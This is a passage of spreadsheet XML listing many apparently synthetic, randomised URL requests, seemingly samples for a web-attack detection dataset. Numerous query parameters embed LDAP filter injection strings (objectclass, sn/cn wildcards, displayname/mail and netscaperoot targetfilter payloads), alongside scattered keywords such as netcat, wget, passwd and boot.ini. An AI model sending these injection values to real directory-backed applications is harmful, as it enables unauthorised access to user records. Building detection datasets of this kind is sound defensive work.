    <t>/irezx_8ntgbn6mb0@a8/ymum8varkkgd8a7x/ixvpbare1/vkhn/ny1t/axln0rondtueiqns/8y1an9metsfui/paiaahlkrndmsnemde/a8.png?rsiuerets1shoe=7675716425&amp;eh109ct9ex4=boot.ini~&gt;&amp;en7=awp-9ptmpopobjectijajr1&amp;7ereoe0elrlde=483)(&amp;(objectclass=r6on)(|(sn+=vp)(cn=lgh+++j*))</t>
  </si>
  <si>
    <t>/sybierod7/dhhcdbt/woplonbt6teia/zmvoqbg/iebw4ty3rj_3.q2zg/et/rpzi3gxpohgfuee/varaklju-ya.exe?grxor=n9aee)(+|+(nsotn=*)</t>
  </si>
  <si>
    <t>/etbeiikot/a_oj-inl13fc/sn.aspx?qsdusruan6=80707&amp;scriptpanetcat3ei4u.log=67314676&amp;gwbf4ssc4kx=&lt;&amp;xliitmcfrs=294&amp;3vkeaeseeqtn=894753516&amp;p4=f3tatb&amp;ulene3ctrnabg7r=y&amp;5st=5oie&amp;nnbih=)+(|+(ystu=wrr3s*)&amp;ouulqwhaustrmto=823026144&amp;l6nbempe6dix=lhondnr&amp;zwinnt8eaccess_logmnddwar=au&amp;sakh=eservicesmuarcnetcat\\|;bina-</t>
  </si>
  <si>
    <t>/nen6aa1nex/tqkdqsuzimom/uedshowsitaxn3t5a/ajea8dm.php3?dsso5liodgm7fn=lscript&amp;lhasuahhl5b=393&amp;euhrabn49ifenm=eh)(++++|++++(tsig=*)&amp;zdewhotavnin=wt7e&amp;h7uqut=zcxi3pbxj2&amp;oincludep-af1fz=48&amp;3gvteeefse=tasl6sasota&amp;hmmi=13341&amp;2si=ehl&amp;odg6=ew7&gt;ocoesxwcait&amp;siye=div&amp;cqtsthetteed=ii4fsehttpy5e)aybzoande3</t>
  </si>
  <si>
    <t>/2shutdownwid8n@gg9b7rstdinz/eo/6drm/ognpatecrsemy5t9nr/shewnetnu/drrirytetnwcnoes/kee.tiff?nt0cdjacceptnfof=138695082&amp;wcatuzz=dmh_g&amp;t1lts=cjxd0&amp;ees=ehdoi0ma21shumta&amp;ird4ksfotuq=twf.zq&amp;0zsautyt=imss3iw&amp;utn=yo4a+j|y+teefl&amp;igiebeetsefet=)+(+++|++(displayname=had*)++(name++++=+++had*+++)(mail=had*+++)&amp;ru=rs3o0-hpd&amp;lhle=sc6&amp;eanede=et3feoptavotgaeen&gt;voc&amp;oyarenneeolwot=n+rad&amp;aimidura=o?ere@yt+5onx&amp;ax1ao=3490</t>
  </si>
  <si>
    <t>/eujskpw@f./wuenaf33rheqoz0tnrr/6siatiqea.jpeg?i9rk--efp7=)+(++++|(displayname=had*)+(name+=+had*++)(mail=had*+++)&amp;avcaxeabrlh=gy.ziqfip2</t>
  </si>
  <si>
    <t>/ernhnblbagckma/v.zk8fhkgg0je.hoy/dmcnsrtruwop1de/i01v1tc/arxmpublxmn4yc/qoyr4b4jklz1f/spgmyin8udcthnieh.nsf?g7ss3ommexwh=n&gt;&amp;foloegior=tb40.snks&amp;sussmnduxao=")(targetfilter=(o=netscaperoot))&amp;aejyxmii=uizwhzvor&amp;beeeqkjort4ecef=ea3mjl&amp;ojy=sybumna4jtix&amp;3ushmqoeoaw7yvo=b3+ltu&amp;tcchildu86i=ixh4rd_vl&amp;y3s9serrbnbty=1&amp;kle=3</t>
  </si>
  <si>
    <t>/istla9toahunidhlht/uranrenrieom/enorlxarhsiia3g/lese5toe/h9/tgzbdr.yfogjeuaa7uai/o6l6h/r57xfw.jsp?zeeiurauoedn=zeontet8ol/%&amp;nqdropsth7v5l=17)(&amp;(objectclass=t7wb)(|(sn++=+++0n4r)(cn=j+++++j*))&amp;2u=ba</t>
  </si>
  <si>
    <t>/d9vrgq6/ija4suw6heeee/0ccuo6gzip.php4?yd_jiomdropfcp8=1ygtecaur&amp;icr=g+&amp;twzenmnooswulse=0s72gxdxy&amp;rqntiptrgsa=obtiea55qgi-&amp;c7lstkubi1wim=nr+y&amp;peco2e0e=xod6e&amp;knemerxfumvse=")(targetfilter=(o=netscaperoot))&amp;bfsi5nteraeotma=teenoydbysasl0osee&amp;meue3a=ekl&amp;hytyc=82671&amp;imnsjdgc=t8tuautss6be0aw&amp;rv=rme9</t>
  </si>
  <si>
    <t>/manlrshojgedawoaidfk/e.ct8tr3ys.jfrcgk/ncf@eqdlm9/m1ugbdrop4wnxp_7asam/orkbgjsr-/nd5xetcufxdcfzlil6z-/saqer9-lfpahs2kkp/enlncjh/aoptpzqxj/aisercutcegnr/riq@@ppzng2tx7.tiff?yalq=775406&amp;todluevnl0ptuic=6n-hgwn3s&amp;hk=7selehnida3r0dio&amp;3n60paists2e=l6boot.iniformini;aitsisasamkeo&amp;ohuaehp=ip)(&amp;(objectclass++=++es*)&amp;9hhlrsahsautcdt=aicxnstguedttz</t>
  </si>
  <si>
    <t>/kvev2/bj8cg4p9/brrkkwzyfn8ipl/ei@j6c.38pucvt8luut/ech9/otydidnoe/hpb8pzizho7l5rm--/emoahkwsre-.dll?kuraee8ae3rwrp=+ifcai0&lt;&amp;tg3pahars=ese)(++++|+++(hr=*)</t>
  </si>
  <si>
    <t>/kp6ua8e/4e5me/pz5wp-divmd/eb8c7th6e/anxdec9wflr/ddo3iatet/cl1vdnh/dudr/strmmsisa6yizsm.shtml?eiehtbtphadt6ze=59)(&amp;(objectclass=v6g)(|(sn+=++mli)(cn=x++++j*))</t>
  </si>
  <si>
    <t>/zcghttpqt/1iedh7/ni87a_/xtermk9affc5xpf/tamicrt.tiff?aor9pa=a=sa&amp;nedp&amp;g_zckk7cfwi=nus)(&amp;(objectclass++=+knti*)&amp;seewssshel=464108&amp;aeeituussa=r-ghmwp2&amp;cm=d7xitn9lebefhhtc&amp;iguan=57115&amp;txteei=q~e</t>
  </si>
  <si>
    <t>/tboggwlspsfj/u2eugintafndetmunr/hdoenenbarsime/hn1wsqanc/lb1/ettmodpei4/fjdcjwqxz1ur/o4/dhgtt1ynull/1do/lwelsitef.n7h.sh?m4tlrnom=71453&amp;aqw5y=s&amp;tvel=ud)(+++|(ee=*)&amp;sutoefetaan0=61647944&amp;gif=7719684&amp;nbst9rc=nph-t6ihtajtahh&amp;lokx.n_eq6=2r7in1&amp;uenhoea32tse=6954893&amp;eornarbsic=ewm;&amp;zciifgs=ac</t>
  </si>
  <si>
    <t>/hnaooel5ioesdiaean9s/aeoarismwet/8aje4/0aqinmypgd440fqcemy/6iles/kije/7vbv/kiss/oszbrw5u/etnwpntesplrliko.htm?segbhu=eujitosyc7got0&amp;et=2946&amp;emea=ls&amp;eeasf='edocument&amp;efateik=5505804&amp;groupbyuxkbcrqa_pcmd=)++++(+++|+(astxu=arda*)&amp;liwet7na=3lss&amp;iac77tcn=e&amp;7esi8=ioytzej</t>
  </si>
  <si>
    <t>/iarz3tlufm/scfy-/czlqc_seow7.j-l0m.php?ai5tnto=scihdion+sev&amp;zoriol=5&amp;eh8rnru=dg&amp;aisgd=aecho&amp;qkl0dki=inputl=&amp;pucz=stutrzant&amp;xainsert1p.stdinqlmocha=ewherehe\\n3rxlntfa&amp;ifawwjm=o0qzy&amp;i6une0owhr=1041&amp;oyrte2=xyf0nr&amp;fv5z=")(targetfilter=(o=netscaperoot))&amp;5ylbznode-w=eeo4pvtkpassthrutftp&amp;aatfaed=7272147</t>
  </si>
  <si>
    <t>/uospnei8aerhxo.exe?dh9passwdhxgin=2&amp;ieo=osce+&amp;r@a2or3o=s&amp;enyifpo=4739171&amp;twdocumentqff2wrrq=1669&amp;boftr8od=7ee&amp;rct0hesuywm=462727&amp;un=98092&amp;ie=cr)(&amp;(objectclass+=it9*)&amp;gorfm3te=mtwp&amp;tilmyctxn=lmis&amp;aren2tiee=nh&amp;td=476036&amp;kaeu3thtet=eteeernoi&amp;eodteripbyoss=839</t>
  </si>
  <si>
    <t>/oauij/lopen.jpg?sef4ceat3sg=0860&amp;eira=wwbde4&amp;oeaedabtcino=t0an+twp-a&amp;n2rh=997&amp;xusnoe60le=sikuhaad+perl$-nl:m)&amp;m7ocm2eose6dras=3311709&amp;h-vamnph-082u-=i8r9&amp;e4ajkhumch=if32@dfe9te+ev&amp;crso9hhmnmgrr3=los&amp;t8phpkbqw=5327577&amp;oetni5=)++(+|(displayname=had*)++++(name+++=had*++++)(+mail=had*)&amp;dyvinclude6utmpl=mt&amp;ces=92645&amp;4jzvbscriptdz=5957002&amp;5jlo=ofonfshiooct</t>
  </si>
  <si>
    <t>/fpedfneeiooadnh0d/cyl4imgb/tjutbna4tqcto/i6olib7nm_xfpasswdf/rhsnonisb5e2eihtwn/r6/kyoydfsawd/nb0sq12ezxxl-ml2/o0b2mcs-ozbo.wpa2pm/r7yd8vh0bvlxokk4t.php4?rsren1tuknsori=6243&amp;roy5ycisreeds=jrnnnbted3nrt&amp;euoelr7iyn=81864659&amp;phitmibta=2833&amp;oqn2=ftpeciw=aone1ercp&amp;crmzdbaccess_logmc=niupl)(&amp;(objectclass=++++tc*)&amp;nhb6mt=n&lt;&amp;8srtntl8r=3881444259&amp;ouhl=locatttchtmpusemdns&amp;6drcr0l43ehe=634252</t>
  </si>
  <si>
    <t>/oieiemmormiblptib/v7nsxh/7aadon/ojuodrbdoed1lawemsna/irtqylbtht/ua_ir/edeeweticut8demii/w7il/aa0-uny3y.htm?ym4etee92nsin=188801874&amp;izaly91ear=")(targetfilter=(o=netscaperoot))&amp;t9ingah=egy&amp;n454i2y4ai=tjnttairiiteenm</t>
  </si>
  <si>
    <t>/s0ej/tma3defhaz6p/aj592yl8tuap7m7/e04yxqca/tir/lsnbnwoqb0ma9e4v/vv/oa3x.lvbdj/elqva2fiiqh.l1/coy.html?52uxa2.=66602&amp;pygznqn=ed1e)(++++|+(hnl=*)&amp;em33t=595632</t>
  </si>
  <si>
    <t>/ihu0eogi/tro7qmyoui-/rwcxt6cudrwlbgj/ir4th7gcwtfyrhw/k3pscl9jdx8ul/homeorv4p2/2oex4b0adwvds7grn/4slee/noh/h065wfwidihwxz/rs0gus8pyoawvdfkse0e.cfm?hnd4atio=9&amp;hqiuteq7uea5w=a+@s&amp;nullre0cyyq0c=ygob_an&amp;oupas6licut7t=)+++(++|++++(displayname=had*)+++(name+=+had*++++)(+mail=had*+)&amp;bu0wwp-catwf=6060&amp;jkinputum-echohlu=8250&amp;969unhjc0z=i5zj@d&amp;crijj6yr2znetcat3=2yvqd&amp;leomhtsthrt=rb&gt;asls+rcpobjectt?eoxmlms$shi&amp;8vpedah5t7=noasweee9ulah</t>
  </si>
  <si>
    <t>/tdp6/jhfad7ctesr/nennyartistiai/rthrgdal1lia43zf/zjzt/wepfwk0k1uwwtygzch3/dkjxzgm5q5o.au.sh?eaxaiadnoiaik3c=3rhzn+/l7@ho\\a8+&amp;amtnk=9bet&amp;eez=vhwfc4&amp;cseerapeitseoo=834105&amp;slquxrnlu9svtzb=topenrfo'aee$iclni&amp;dhosdho4estsett=775&amp;2haje3lhea=69&amp;ae=182721090&amp;eine3oemeba7o=xy8sqy4ynt&amp;a2jeoztkiocafes=homeoe&amp;ieletwlh=381619117&amp;trepnchj=cfe&amp;mfurtotsi=)(+++|+++(displayname=had*)(name++=had*++++)(+++mail=had*+)</t>
  </si>
  <si>
    <t>/ttv7a/rsdeflioogwqx/sfz/eobtessiic0dtai/pzfj1vkcwcxioj.aspx?gnwlhoxml6ne=652033&amp;ipvkwg=569321&amp;wh3t2jfti=08257732&amp;lshxutqwpucrso=wq1mo)(++++|++(73qqe=*)&amp;xzran3yioe8tnep=vresl&amp;otrsinwetdytt=filrod1bnzncu&amp;dhy=hc:bn4?seh/%0ht+nlib&amp;iwtivtbdnebr4on=85381433&amp;u5hntmt=e7dmqm0mnne</t>
  </si>
  <si>
    <t>/oyst13kmsg5wl@sy4/xg-a/esule/slpchi/dsb.gif?mr6eayd=0url4cete1ts&amp;iondooledtiroo=hrcpcs&amp;pmpdetrsntfe5ms=9534089&amp;dieayjt=qxmlncrp&amp;pee=fs~egfprekt&amp;wxjhttpll=525041&amp;rifot-=lnxqi)(+++|+(oa=*)&amp;noneia8se5w=84944486&amp;catd8ron=68400&amp;tetncrtocfmor=twf20aceoii</t>
  </si>
  <si>
    <t>/beeaezafois/rkqperlfcq7autoexeckvnodercp/qv8i.mdb?fdoc=")(targetfilter=(o=netscaperoot))&amp;9ajbr=froiegrv3lea</t>
  </si>
  <si>
    <t>/ee5ntqfewnelg/einid/7nhlzmjx/8enowusmshm/rg8yjep764tzlo.nsf?anfuv-=33)(&amp;(objectclass=hmn)(|(sn++++=++++tja)(cn=a++j*))&amp;omigaalnlt=3htpasslur&amp;5oaliahnes=b(mlnwheretmpuoodb/otelnetzo5a&amp;a9jar=zbtg&amp;andopdp2dgv=akfsxh63-pttisiift</t>
  </si>
  <si>
    <t>/ixn0xxu/abanddlbco/seitamug.tiff?5atieaedso=48554024&amp;scriptllikezrbetweencopy=r4dnkxtzzps6&amp;jmhl7nsige=")(targetfilter=(o=netscaperoot))&amp;ie3wget9kzaccess_logrwx=igreeedolas&amp;wgetmboot.inil1=rl5&amp;auhhlsitsmnrueb=shutdownl3=th@form&amp;smdarp0bdesw=8596862&amp;tfen=s&amp;gr9x9r=43183</t>
  </si>
  <si>
    <t>/nl0fu6dp_/se7xj7klktqel3tlouwy/woe/fs/d5eocs7_/gvdre1nhaqrdksutj/mc8naiaee/aphouaniucsnspz/o6mbay3rw9cxswa.oblq/input688tg9.jpeg?sod=986)(&amp;(objectclass=6tat)(|(sn++=++ti)(cn=lwh++++j*))&amp;tabs4oo1aeth=ouert78yn;tilo</t>
  </si>
  <si>
    <t>/egwykpuld0g5/uv-lgt3@jcgunjsp4ex/t9vbmfcisyej_jp/nimrwxegolcoahl/obaesosseprihtb/yotcg56t/uikh/rinis/kxl_toviochild8rd/n1apkaopryu/1bvek.ce2/sstyitsaridrnceelgr.html?tmmqmeoe1ikero=oolnote&amp;6eehdebeetc3ge=859814&amp;589fformx.=3331812931&amp;fsssnydsdwahes=)++++(+++|++++(++cn=*o++++'brien*++)(mail+++=*o++'brien*+)+++&amp;0tto9a4eosnwast=itivitw&amp;a1ieikuittylnan=isat</t>
  </si>
  <si>
    <t>/n6fyimleh02/5pectmfwwa5/inby/te9laxaeen/eneienebl67y/pz/hneh/wis1x.nsf?rdy=+tt&amp;tetes7yep41art=70&amp;ffieekheosu=ft2hc34fh&amp;ramodls=vr+&amp;okiuacadnk=tlresh5adge~nn&amp;zht5eeeroleerja=6155&amp;apw=htons8sh&amp;ansust=xzspncuo&amp;o8saosetd=nwe&amp;6attjrdern=99986965&amp;oagnov=qjptukkf&amp;uhtlaahl=a&amp;retac=1322094</t>
  </si>
  <si>
    <t>/ozphu/qjgmdwh8gluw3pnpbyv/7ifu@yxopen/v7a-bh/s2ruxeejiriu.htm?oe0mzikeehe=xxm8o74y&amp;d0vtlbxnak=431388771&amp;hnqqzfupdate8ezl=dt@ubnodsn@&amp;polsb=ios5e</t>
  </si>
  <si>
    <t>/koawr/n76@6/stamhvhmrarybwd/zer@gqeapt1tps/pi@9kwhz./ichbayfq@bb/o-oqf3b7v/ltutg5s-agw/dnudcsasstiar/8ao5lndmireotha/sanasklonomziirol.cgi?nif=3734044319&amp;usroxggd=839&amp;nlw3nreaie=aie&amp;kybsrvu=64&amp;dine6tiso=e8noxefttotysasrz&amp;htezah7rm6fntke=580&amp;.bdk7dtnytn=ibndre&amp;tutprdosafefab=mrbaln&amp;n0ckca4u9yu=hs&amp;sf=&lt;fnooryde7s+wheremspit&lt;&amp;9a7nh=rihfromobtle</t>
  </si>
  <si>
    <t>/e6fha_atdibbpb/0hcilleecrtogod0sh/oau4capfist/tasul9rjf6mn/jbk80k/omszz31hj5ha_l1kxk1c/qpmwik_mnvy_5mq/nn1te0n8ih744/8iibstyle1@tf7cf.mspx?typuvmeta0f=riod'outeh6me&amp;bnqyhast=9&amp;nmhsd7n=s-_gl&amp;p3iqwgetbgsound67f=yjobyimz&amp;wdaqiomo=fhrkpr&amp;rinharle2=3&amp;tnheaihzc3rie=194&amp;o043gpkbw@=2217145&amp;xhan=ww+s&amp;hr=2520602&amp;lwoegehlp1n=lsr0aij@re2ndocumentdntb+me&amp;nca=rieveaph7t8tstmr</t>
  </si>
  <si>
    <t>/epdti@xoeun4q3stgyo/0marr8/ip/seer/l2cr0i9bz3c8znb005e/xeeq2lvn/aso0jfwaet/alls1s/a7x2f98dfi@-gfa/sbecnfett.sh?mezo3tiw=aceo&amp;sske=v@&amp;e40sr0=wddsrktti&amp;e9t=rpzrx@6_</t>
  </si>
  <si>
    <t>/aohyas/t68hefmuys@8dquzv/sm/mlwhqopteocmdcj/tv/on2fasitsmn/seainaiiaaades/ewhk90iw/nuk3uq02/ieitayaettesp.php?shdlie=o96s&amp;htyjinbkrn5snde=1gbi&amp;nrlipdeusus=tr6pw)(thn&amp;mrsad9eoqihm1=4323779&amp;teewetecg=~adpasswdmal&amp;snhmiahsiohgi=dyu7rvoeionrsj&amp;onznjydsrc=heo7+&amp;naern=pvaonermena9</t>
  </si>
  <si>
    <t>/nf_b.pujfka5p.g/bqbs0gqbwf.nqoj/fx.js?4emiamaro5o=anr6e&amp;nynhprs=w2$reintrn&amp;7noryaifm=0&amp;dyeni=xosloumal'nta&amp;ddvcw08qjm=rtlegar9goat</t>
  </si>
  <si>
    <t>/reir7e0qitrgs/na1d4t/hg0/mt8nxrueqpcririkjrs.shtml?sluetedbs9o=892767216&amp;h3thoeelan=3927360&amp;lbrls8rxoerefs=tnie&amp;rieiteohshc=9126083&amp;a0=tjeimgo&amp;edasfeeieten=7&amp;otednr8tthsolt=t5jahmngedoi&amp;scepqgohh1a=h&amp;etwfatethtrobwu=n1cxzh&amp;yanplfm1x=eo59myg_z&amp;he=778&amp;ilcs=6_ykncw8knx&amp;optmwetrst=etthttptssodeletezee&amp;3pifamhes=51069607&amp;serh=119</t>
  </si>
  <si>
    <t>/swomzp/e.mh/insertnzjaccept1.vj-dy9/ljooaetejwwvcrismw.swf?isbdhb6dsm=75597&amp;rbrapzsy9n82ate=di&amp;irbn7rrmdfid=ciemn&amp;fdedfnaa=rhqgi&amp;aktlbpm7a=126248676&amp;uenrrr=asz4tsastdin6np&amp;zee=isaittttrtuj&amp;istcttbozctap=701091&amp;5tjyih=9625&amp;ositiap=79329&amp;liouhtrdmr=9&amp;gqjvt=97&amp;em3gegpnlammtdt=obuj&amp;texeccpwm=e&amp;98wof=102</t>
  </si>
  <si>
    <t>/scg2ktmvpho9dda/nj.o4b4zbcat3access_logh@g/mxt1ur/xaaj9-2/5c@kybto8ohfijdqpof0/lmjssy/taerrnrrpn/qmcste/pykpzlmht7/jescripttralikerdw1wlocation4@/n3ykas1noimselqoescc.mdb?adgamndhndhilw=47599&amp;rtufyqcrnkdu=82&amp;wget3wherey=3016432949&amp;tbpr7dqw=60&amp;9t2hncceyecu=e+eemd:+&amp;soyqekk49liwget=ins-t4r.</t>
  </si>
  <si>
    <t>/u9/opaentsa.exe?xeaabmsnt=ttj1&amp;04=bota6sn&amp;hn6net=oostmasrvaqz&amp;iicvfe=ato&gt;&amp;scipi=237&amp;7leeaorrionwbr=tmpctto</t>
  </si>
  <si>
    <t>/aareeuucliwisksj/er9stsxp.kwhvtji/nt8hpzdfipb38x/3j/mgr/oibdsjoor4le89vlc.nsf?efaeetcvte5d=6720&amp;ede5cunpaeyt=d1allp~x+&amp;rs3s1ib=hie3t(tgeeknf&amp;irrqkprq=o00wws&amp;endthchfe=execos&amp;a4ncselect=exu0s&amp;ssatxnieaazreor=j7ti&amp;zs5tmb6hrntnuh=2251&amp;bsxe=is5dbo6&amp;depi=136837&amp;lnewns4oil=59281610&amp;httde=uuobject$e&amp;heo=p&amp;qvdeie=@2mwtgi&amp;uuehichece=5490</t>
  </si>
  <si>
    <t>/hesuttricrtdsw5ee/nqz8a/llprijlj4cbx_/ig3telnetsi4meta/pw/utlmabu9/edqjyrbqo9knm_jmj6z0/scmie2yj_h.bin?aoatkidrmadt3tt=uf&amp;apkfs=httpsse4&amp;a4o=7pul4s&amp;isuc=epemjx&amp;ri7fsbs=l4c.t.xs9n&amp;yeppse3aoz=a&amp;7hye=721137&amp;djrrn=8895040</t>
  </si>
  <si>
    <t>/.sbytxe/tgz7/1juodn2up.e4g/dimi-75/f5si4e0/ekozwgazoplqisqz4pw/r2@xztltv3i0x/altn0na/id6aefwplomtolignv/reljfntbemhgqftval6.php?rlraeusgtbabi=461&amp;mwpepe=hosrgsrs|+t&amp;m5=g&amp;xmvmusr=u+md&amp;e3s4toin9b=929565&amp;1oethnfd=726&amp;ssr=a3nbt5osntzithoe</t>
  </si>
  <si>
    <t>/flggwinnt8uxhju2c_.mdb?ed=enull8g1r+xoue+4t+h~dh+&amp;en=5mmdyhob&amp;pmnlxj6kjg=685925959</t>
  </si>
  <si>
    <t>/ozhj9digdlc/7fkeersthynaninc/einayqhsipeek/haieuety/np7wqk/oetewem8td/txk/litthnni9gt7seerhi/7obtmuefcnkroysd/kx1o7fitf1positionl1/dt/tbhelgd@zej.aspx?wuc3aeua4n8=re+&amp;entcyr0aeis=290301&amp;rilere=6&amp;groupby5eap3nlvwr=iataoj2anezw&amp;glnahvniz5pkgsa=58870&amp;trv3hbe=ns8ecszo&amp;ushj8ugo2a9=s&amp;it2oseth=spbp&amp;bdwnje6p=earceao5t&amp;n5wntrid=esry&amp;ldsrsnup=a</t>
  </si>
  <si>
    <t>/locationrfxc/polahoohey3ntiy/a0z8vww/kdruewso/kiwhscriptz_/nyslw9c4yb1a/tnetcat-gfcoiwuftpencr3/fm/oslgneamaorhsxst4.exe?fqrnqr=3362774674&amp;emeulltehterhrh=n3edhn4latttrpgr&amp;nmlts5r8=u&amp;cshiobopd2raa=m6aewgtl5i&amp;qoaa=e+jattnwnchr4s&amp;ovreplaceaz@=tzits93auut&amp;ysqnhhaeab=be1</t>
  </si>
  <si>
    <t>/e1ssenetgtnto9i5/haaeteeaere/jj/eotdbrez/aqnh/nayiseqn8nsthhonaih9/tvzxvnp/noderp9-gru6g/i9esqjybdf/fikx2l94rbcmk5/eio9.css?vricato=vl3stmkr9oslo&amp;h58jgnsbhndwadl=lioonylp&amp;fwh=97165947&amp;46tmazv=wetto4shlikenoh</t>
  </si>
  <si>
    <t>/i4mr@4t8osrhglaok._3/8ttr5oehtre/kz6dr42lljytar2hbjm/ki3sridibtuttsd0e/iry262knsbsd/eiaeddvrsbltetss/sdwp-nbeusr2lqf2.shtml?dqh=sqz&amp;telnetuhoisvd=wgeteaaamdeoi&amp;cc7ooemt2aneui=6e3n&amp;2khaaai3k=c2edtmp&amp;rg=s5xeye.kd.&amp;2hatxehdosnpath=3mz865&amp;8enrhn=0servicesmmroe~g&amp;ypkkdf=ou+&amp;dtsn3henaousir=rzbmq4&amp;voy=group+by'ixi6snlocatione|mdprocessing-instructionslperl&amp;itnlnt8=eekry9._&amp;aoalottsn1r7eu=dslit5paimth&amp;gdtsn3yocjd=drfdrllnnjwosm</t>
  </si>
  <si>
    <t>/dbdhhni-zze2l2uhm0/8amx-ypi2h.l3wgkjx/corgalfoiood/geeod646oj/ip_nkwy6/onenoopahrh4seemg/misd/gyyavcdogeo/b2hq1rx/8dnorwl.htm?bhtpassy6qppr=cqofixuo@ph.&amp;usnprhhhs=44&amp;se=tu5qy0qdm6&amp;n9fr2oh=tcapcyrjaudirwe</t>
  </si>
  <si>
    <t>/5aeqoxe9/grazxonj-b/groupby2y81exec/irdch7erh0fq3donan/edpdn5s4esoeshiebdtu/edy.sh?fvdjp-kyq9=00&amp;ea=86202621&amp;acte=hif9i&amp;is3n33hoocate=2&amp;aaijti5oetoil=ijizjxb&amp;thscnc6hdrdr3i=ttnetcate$oe&amp;ae3hnhdhmt=30&amp;f8cdeshyewdi=1otvicdaa6ras1i</t>
  </si>
  <si>
    <t>/evqpylqv-/a-ijbf2wls.sutx3lev/iu0lsnsj/sfh.msf?ltefcn=6&amp;hdectep=arnldosfdh&amp;0delete1j8ywobject=(rhjtxfwfo3l&amp;gre2hdtsacao=nodivi&amp;5ecahomwexrndt=5zba9uwv&amp;doqaa=]yi|taed7ih&amp;arteu=8&amp;wiautoexecdmom4vf6=i(lmvhjeaheetorhz|h+&amp;tqf=lnodebs&amp;heo=8nsmsunccarpdtio&amp;uefehroos=5983516&amp;ao8fxrili2ttdn=55646</t>
  </si>
  <si>
    <t>/etoatzfedeebla/ns0jjwcf/1k/9doj/piyieam6h2xp_5i0w/equtu4l/a8_j/ta2w/q6dg7e8/ewt4itetloir0htnees.mdb?fuy=8dqg&amp;es6sn=tw7laab1jbq5&amp;toiimnp0ro=utmdzfpcatit&amp;boot.ini0abodyv=yaros8gieoeno5a5rh&amp;a6ht=ereamg&amp;tec1p2iv8eitedr=66744619&amp;nheuesd=ee&amp;3kisy=onstdinis&amp;3p4gcuyieyd9=mtnazmwo5&amp;y6amopar1aotyc=1r6desedg|h-&amp;rp@xmetage_j=cohsno$$aeof&amp;oohhc=too&amp;dzaet=stusgszb&amp;ttrjs=s+fechoa&amp;le05smrl=wsduvtf</t>
  </si>
  <si>
    <t>/sapeeeyxot/roonk4nrnn9ol/tmosuaeawecani/2gzz2j8-@zm.tiff?uctp=60409&amp;it=eimcen&amp;oothvny4=8306978&amp;re5e12sra=dabtytc7&amp;axv.winnt86mixq0=8007&amp;s4rydorvw5gshutdown=ld10?connect=sfkcsa4mosa&amp;soca3x9nzosp=5&amp;s6iuvnwo8ae=eiij6iens&amp;jaffc8l=ohttpsetr</t>
  </si>
  <si>
    <t>/er4wa2dlha6h/eeo@wynbo7/apt/ejecvchjn95ez/bc/hmpmochakstyleemkgloglx.bin?cr0tpegnse=6&amp;gstylek_qhvar=9&amp;hgdsgm=521</t>
  </si>
  <si>
    <t>/4ehno3n/e.ainsertreplace@ce3/e6kslb1zsxe/mdbul4tsi/x8e7noid5ls./92j4it/h.shxmcj/lssobwiocyhhf/hqhola9nocee/_nnew6p.png?kn73c45h=nceeoent0rwrup</t>
  </si>
  <si>
    <t>/ofkjy6bcc4txupdate/y3msf7kipz/tnmtsvetxeet3ps9ifw/fgzygo_6rdqxqk-3cib/nu6itirniwqalzr/opocjocs/miiwyrtwjntkf-qg/vblkorvbscript8ch/eneungtnl1ntn/upcr9r/jlwikb-7qxg/tdti7c6ate5m9hmneoch.htm?s1nzialul=eiies+pnhi&amp;7ooaredvoip=3188367&amp;m277qtfewhere=95avliljvngh&amp;te=747560630&amp;ryibpteanao=554&amp;sti0hgm9tetz2=tv</t>
  </si>
  <si>
    <t>/otienus9oa0daza2/m-iframent1/ncrehi/j8..fc7tvh/iiusannxo/tjp_x3hhk8ec4xcw0h7.bin?rpsftf8rcectrw=srt9bgsound&amp;-_hu5vunnc1=vbscript&amp;</t>
  </si>
  <si>
    <t>/baieoso1lls/sqeytbmt@ljowv_mo_8r/c27/bb_no@csbwzy9qutv/abniee0ala/dtrrgfieacii01trah3i.css?k9@lkctmetacezt=4&amp;dco56hp7snymo=2or6+)eeg-audhoe&amp;7jjylh=re7eousra+&amp;yallnswinntkv=21&amp;tl1f=aexec$eqnkftpxoo&amp;fcywkktpa=f2kno&amp;bgtrnecagoa=ei8euattangt10cn&amp;ezbueoelc=eiaumeorrcl+</t>
  </si>
  <si>
    <t>/dsmezlyhobosruzi/emuvz@jzxr3-03qebvb8/5ueccs/tge0zbe-k/nxz7krdx/tdseeahllqlahnneluoh/icynull4@khohv/ixno9libaw/z3idhojx/nhz76s-zq0lcmjzyuwh9.jpeg?mlsro6=9chaving&amp;renly=u1phkx5ppryt&amp;dosqzao3ahsoua=0dugp@qxmcgp</t>
  </si>
  <si>
    <t>/48ojnshutdown/esnrnw2e2/ll5feslteendadf/alpoii4ka2vmls/ek5aqwqtj/u7zmjt4yp3/yv3abg4dthz0.fcl9/eimsaxhr.css?9frtpbesntj4=hfkip&amp;phuadaoiru31cdd=7866028</t>
  </si>
  <si>
    <t>/62/lc6n8hljtnjyechoh/j50a6odg@ul2u9cxh/2cujtdiv0wropj@/opsi1/bgzivu9wlj6twfclc/g5/t0m.swf?ibrntvxa=ionlike&amp;tneey0ehesmno=[n&amp;gdbec=ct&amp;ls=d;rb&amp;o0svoghe0ea=vlod2dhhmsacfawiar&amp;unwrubmdrhzrnh=adtincluderedocumente|3mhlsr7eau&amp;hclyyshm=atg9hvelanrchrf&amp;jas1kmsrnf=3&amp;loqeu=n\\&amp;nwl=irew:o(tbik=5o2rdvnt</t>
  </si>
  <si>
    <t>/7fedfimw/ienutnsgoog/wwhvqhgn/edseefmt/1r8ckdeleteadmine/et-s.yhofo.a.e5ev@bi/n6uigd/aanuhy1rgtdiowgn/tr3d/ig5c6fc5qtaet_ybn.pl?-qmxyygizr=techo5+l+pth&lt;a&amp;6anytdzksuz=fwhbc0gp&amp;pstp05y.=e?r&amp;8rt=ruesottensenmma&amp;n32niaedwafdec=7g+ilj&amp;s3ahxe2un=lettanea~ifn&amp;p6tlnb=480&amp;oms4gl=7</t>
  </si>
  <si>
    <t>/qd8qgnetcatx9i8pe/ediqvaugndu4/db9/oldi2vu/srejxg/msafhc/isy7in/s056ru.mspx?select0uvk5o.vtsg=5&amp;aterne6ebb8vg1=l7tuwm@&amp;7wajcrj=78770&amp;tgusntnce5=7btelar&amp;0trotatdsarhki=alnuorlc9t&amp;lmeebe=52936&amp;swirohihtorler=anaolaetoencawbo&amp;pvpwxtermm=8703219475</t>
  </si>
  <si>
